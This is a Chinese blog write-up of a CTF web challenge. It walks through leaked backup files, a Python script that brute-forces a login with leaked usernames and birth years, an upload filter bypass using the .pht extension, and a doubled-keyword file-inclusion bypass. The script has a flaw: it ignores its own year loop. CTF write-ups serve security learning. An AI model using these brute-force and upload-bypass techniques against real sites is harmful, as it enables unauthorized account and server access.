“百度杯”CTF比赛 九月场-web123题

于 2021-12-29 09:08:14 发布
阅读量474 收藏 1
点赞数 1
分类专栏: writeup 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46784800/article/details/122208239
版权

“百度杯”CTF比赛 九月场-web123题

知识储备

敏感信息泄露

敏感信息泄露,是指存在一些备份文件未经处理,而保存在网站目录上,可以进行访问,获得一些信息。

网站备份文件泄露常见后缀

.bak
.html
_index.html
.swp
.rar
.txt
.zip
.7z
.sql
.tar.gz
.tgz
.tar

网站备份文件泄露扫描工具:

  • Test404网站备份文件扫描器 v2.0(win)

  • ihoneyBakFileScan(python)

    ​ ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件
    地址:

php别名

补充php的别名 【php2, php3, php4, php5, phps, pht, phtm, phtml】

实战测试

进入网站:

image-20211228213008669

查看源代码:

image-20211228213034736

提示存在user.php界面,保存的是用户信息,访问该界面:

image-20211229081319270

发现空白,检测是否存在敏感信息泄露

发现存在 .bak 备份文件,访问该文件,弹出下载框:

image-20211229082310367

打开可发现,文件中存在用户登录信息:

image-20211229082359158

根据提示,用户登录密码为姓名+出生日期,但是具体哪一年并没说,但是盲猜应该是1999或者之前,所以此时我们需要对其进行爆破,从1999年往前扫描,逐年进行判断:

爆破脚本代码:

import requests

url = 'http://6d2809fd89d340e0bf1d71bc970c80fe81e45518f41e4aa3.changame.ichunqiu.com/login.php'

data = {
    'username': '',
    'password': '',
    'submit': '登录'
}
num = 1
file = open(r".\user.php.bak", 'r')
for year in range(1999, 1988, -1):
    for name in file.readlines():
        data['username'] = str(name).strip()
        data['password'] = str(name).strip() + str(1990).strip()
        print(data)

        response = requests.post(url, data=data)

        html = response.text
        if '登录成功' in html:
            print('登录成功')
            print(name)
            exit()
        else:
            print('登陆失败')
        print(num)
        num = num + 1

爆破出登录用户名为:lixiuyun,密码为:lixiuyun1990 。(说实话,1990确实是挺绝的)

登录进去之后发现是空白页:

image-20211229082957923

查看源代码,发现需要更改网页代码:

image-20211229083111688

根据提示,打开f12,进行网页代码编辑:

image-20211229083201067

此时,出现文件上传点:

尝试上传php文件,出现报错:

image-20211229083312652

说明存在文件后缀名检测,使用burpsuit抓包,进行分析:

image-20211229083450209

更改后缀名:

image-20211229083519679

发现更改后报错:文件名不合法,再次更改为 .png.php :

image-20211229083608606

发现报错文件名不能存在php,此时想到可以使用php别名进行替换:

测试后发现,.pht可行:

image-20211229083706809

在响应代码中出现一个新网址:/view.php,访问该页面:

image-20211229083809990

出现 file?,则可能是一个文件包含漏洞,输入file的参数为flag进行尝试 :

?file=flag

image-20211229084002112

image-20211229084014653

发现提示过滤掉了flag,继续尝试flflagag发现可行:

?flie=flflagag

image-20211229084125200

image-20211229084135453

成功爆出flag!

学编程的小w
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
百度CTF比赛 九月 123
drip_big的博客
04-15 396
百度CTF比赛 九月 123 目内容: 12341234,然后就解开了 这次目内容真的就是一点用也没有 1 爆破 进去就是一个登入界面,看到啥也没想开始尝试注入,直到后来失败多次看了源码: 所以写ctf一进来就看源码真的是个好习惯 <!-- 用户信息都在user.php里 --> <!-- 用户默认默认密码为用户名+出生日期 例如:zhangwei19...
百度CTF比赛 九月123
whisper_ZH的博客
09-26 351
一、敏感文件泄露 刚进入目提示进入user.php 并给了账户密码信息 登陆进入user.php发现什么都没,扫后台文件(没扫出来啥玩意)看wp发现是敏感文件泄露 输入user.php.bak下载文件 常见敏感文件后缀: .swp .bak .old 文件如下 配置burp 爆出来一个用户名和密码 登陆进去发现一串注释: 构造html把注释弄掉 开启你的上...
百度CTF比赛 九月——123
夏日 の blog
03-20 1223
目录目描述writeup小结 目描述 writeup 打开页面是一个登录页面,查看源码发现提示语句 访问user.php发现界面为空,此时尝试打开备份文件,发现user.php.bak,下载后发现用户名,根据上述源码提示采用burpsuite爆破,配置如下,注意选取Clusterbomb模式(因为要尝试多个payload,详细见:Burp Suite Intruder4种攻击类型) 三个...
百度CTF比赛 九月---123
weixin_30411997的博客
04-07 132
右键查看源代码 然后构造user.php,显示空白,源码也是空白,既然上边说用户名,密码了,参考大佬的博客,放文件user.php.bak这是备份文件,一打开上边全是用户名,有戏,爆破 添加字典,也就是那个备份文件 爆出了一个结果,用户名lixiuyun,密码lixiuyun1990 登陆不显示,查看源码 大佬不愧是大佬,自己都想不到,本地构造个html,来绕过漏...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF-AWD-WEB:AWD 模式下的WEB仓库
05-17
CTF(Capture The Flag)是一种网络安全竞赛,其中的AWD(Attack-Defend,攻防)模式是其中一种常见的比赛形式。在这个模式下,参赛队伍不仅要保护自己的服务器免受攻击,还需要找出并解决对手服务器上的漏洞,以...
百度CTF比赛二月第三比赛(Reverse专赛)的CrackMe-1
03-30
百度CTF比赛二月第三比赛(Reverse专赛)的CrackMe-1目。
CTF比赛编码工具Captfencoder-1.3.0
09-21
Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) ...
领航 CTF 2021 决赛 真 7z
12-07
领航 CTF 2021 决赛
Test404漏洞扫描器1.7
05-25
集成了很多插件和功能,基本上这一个工具就够了,用过Test404的用户都知道,还是非常不错的工具!推荐!!!
Test404网站备份文件扫描器 v2.0.rar
09-15
Test404网站备份文件扫描器,用于可下载的网站包括backup db data web wwwroot database www code test admin user a 1 bbs 123 data bak oa admin wwww 2014 2015 2016 2014 2015 2016 2017 2018 2019 2020 1 2 2 123 a back backup bak bbs bbs beifen beian data db flashfxp fdsa ftp localhost gg hdocs hdocs HYTop.mdb root? Release Rel
网站备份文件扫描工具
11-26
1.无限设置多个关键词和长尾词,软件会自动使用搜索智能引擎搜索,获取结果的域名进行网站空间文件扫描。 2.智能引擎搜索支持多种主流搜索引擎,目前支持百度,GOOGLE,有道,搜狗,雅虎,搜搜。 3.可导入自己本地域名文件域名扫描,用以扫描自己采集的域名。 4.查找文件自定义,支持多个查找文件,并支持变量类型。 5.自定多线程高速扫描,普通ADSL开150线程平均每分钟可发送HTTP请求10000次以上。 6.扫描结果自动查询文件类型(Content-Type)文件大小(Content-Length)。 7.结果过滤功能,可过滤大小小于指定字节的文件,可过滤文件类型为未知以及文件大小为未知的结果,最大限度清除垃圾结果(可过滤比如自定义404错误页面 或者防盗链组件生成的页面)。 目前支持23个变量分别为:功能灰常强大,具体请看下放截图. 1.flashfxp.zip 代表扫描域名空间是否有FTP打包备份 = flashfxp.zip 2.flashfxp.rar 代表扫描域名空间是否有FTP打包备份 = flashfxp.rar 3.新建文件夹.rar 代表扫描域名空间是否有新建
百度CTF比赛 九月 123
weixin_43858799的博客
05-19 1109
1、打开目 得到一个登录界面 2、ctrl+u 得到作者提示 尝试在URL里访问user.php 发现没有什么反应 则尝试一下user.php.bak .bak后缀的文件 意思是备份文件 基本与源文件相同 访问后 跳出一个下载框 我们下载此文件 打开之后发现 是一些名字 所以把这个文件当作字典 进行爆破 3、我们先随便输入以下用户名和密码 用bp抓包 清除一下变量 模式选...
百度CTF比赛 九月123 ---------i春秋
weixin_30359021的博客
07-08 248
目地址:https://www.ichunqiu.com/battalion 进入目 咦,这是让我输目上的12341234? 然后然后,被骗了。。 看一下源码 有东西,访问一下user.php,什么都没有。。 但是可以访问,应该是隐藏了什么东西,百度搜一下隐藏文件的类型,找到一个.bak的,数据备份文件,访问 头皮有点发麻,文件内的像是用户名,把这些用户...
百度CTF比赛 九月_123(文件备份,爆破,上传)
a173262565的博客
04-21 173
目在i春秋ctf训练营 翻看源码,发现提示: 打开user.php,页面一片空白,参考大佬的博客才知道可能会存在user.php.bak的备份文件,下载该文件可以得到用户名列表 拿去burp爆破: 这七百多号人就没个1999年生的?拿1998继续试.....又凉了...一直试到1990年,终于有个大佬是这年的 账号lixiuyun,密码lixiuyun...
i春秋 “百度CTF比赛 九月 123
include_heqile的博客
09-15 1284
https://www.ichunqiu.com/battalion?t=1&amp;r=0 首先查看源代码,得到提示说用户信息在user.php中,但是我们访问user.php是得不到任何信息的,得不到任何线索,看writeup得到提示,关键词文件读取漏洞、备份文件 于是我就试着访问了user.php.bak,得到了用户名信息,然后根据login.php注释部分的提示,用户密码为用户名+出生...
i春秋 “百度CTF比赛 九月 Test
include_heqile的博客
09-17 1013
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=0 这道还是蛮不错的,下面我来说一下解思路 首先进入目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
ctfshow-web-web红包
最新发布
07-14
### 回答1: ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包是一个CTF(Capture the Flag)比赛中的Web目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解方法还需要根据目中的具体情况来确定。在CTF比赛中,每个目的设置都可能不同,解的方法和思路也会有所差异。因此,在解过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包是一个CTF比赛中的网络目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学编程的小w

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值